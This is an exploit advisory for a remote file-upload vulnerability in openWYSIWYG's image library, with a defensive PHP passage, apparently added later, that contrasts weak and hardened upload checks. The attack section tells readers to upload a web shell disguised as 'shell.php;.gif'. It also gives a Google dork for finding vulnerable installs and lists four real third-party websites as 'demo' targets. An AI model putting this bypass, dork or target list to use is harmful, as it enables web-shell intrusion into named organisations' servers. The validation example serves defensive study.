
openwysiwyg Remote File Upload Vulnerability

Author: The Black Devils, Published: 29-09-2012


# Exploit Title: openwysiwyg Remote File Upload Vulnerability
# Date: 03/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.openwebware.com/
# Category : [ webapps ]
# Google dork: inurl:/imagelibrary/insert_image.php
# Tested on: [Windows]


-------------------------------

http://localhost/[path]/addons/imagelibrary/insert_image.php
Upload your shell as shell.php;.gif,
or use Live HTTP Headers.
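
A name such as shell.php;.gif passes any check that looks only at the text after the last dot. The PHP below is an added example, not openWYSIWYG's code and not part of the original advisory: it contrasts such a check with a stricter one for an image-upload handler. The function names, the allowlist and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: upload validation for an image library.
// ALLOWED, weak_accepts() and safe_image_name() are hypothetical names.
const ALLOWED = ['gif' => IMAGETYPE_GIF, 'jpg' => IMAGETYPE_JPEG, 'png' => IMAGETYPE_PNG];

// Weak check (constructed): trusts whatever follows the last dot.
function weak_accepts(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED);
}

// Hardened check: returns a server-generated file name, or null to reject.
function safe_image_name(string $clientName, string $tmpPath): ?string
{
    // Exactly one extension and conservative characters only (no ';', '/', NUL, spaces).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $clientName, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // The content must parse as an image of the claimed type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[2] !== ALLOWED[$ext]) {
        return null;
    }
    // Never reuse the client-supplied name on disk; the generated name
    // with an allowlisted extension is what keeps the file inert.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: a minimal GIF header and the file name from the advisory.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x80\x00\x00");
foreach (['photo.gif', 'shell.php;.gif'] as $name) {
    printf("%-16s weak=%s hardened=%s\n", $name,
        var_export(weak_accepts($name), true),
        safe_image_name($name, $tmp) ?? 'rejected');
}
unlink($tmp);
```

In a real handler the second argument would be `$_FILES[...]['tmp_name']`, and the accepted file would be moved with `move_uploaded_file()` into a directory where script execution is disabled.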

-------------------------------
# Demo site:
http://mprmpolytechnic.com/wpro_js/addons/imagelibrary/insert_image.php
http://www.asnh.org/wysiwyg/addons/imagelibrary/insert_image.php
http://www.menlo.edu/sites/all/libraries/openwysiwyg/addons/imagelibrary/insert_image.php
http://peaksport.com.ua/sites/all/libraries/openwysiwyg/addons/imagelibrary/insert_image.php


-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
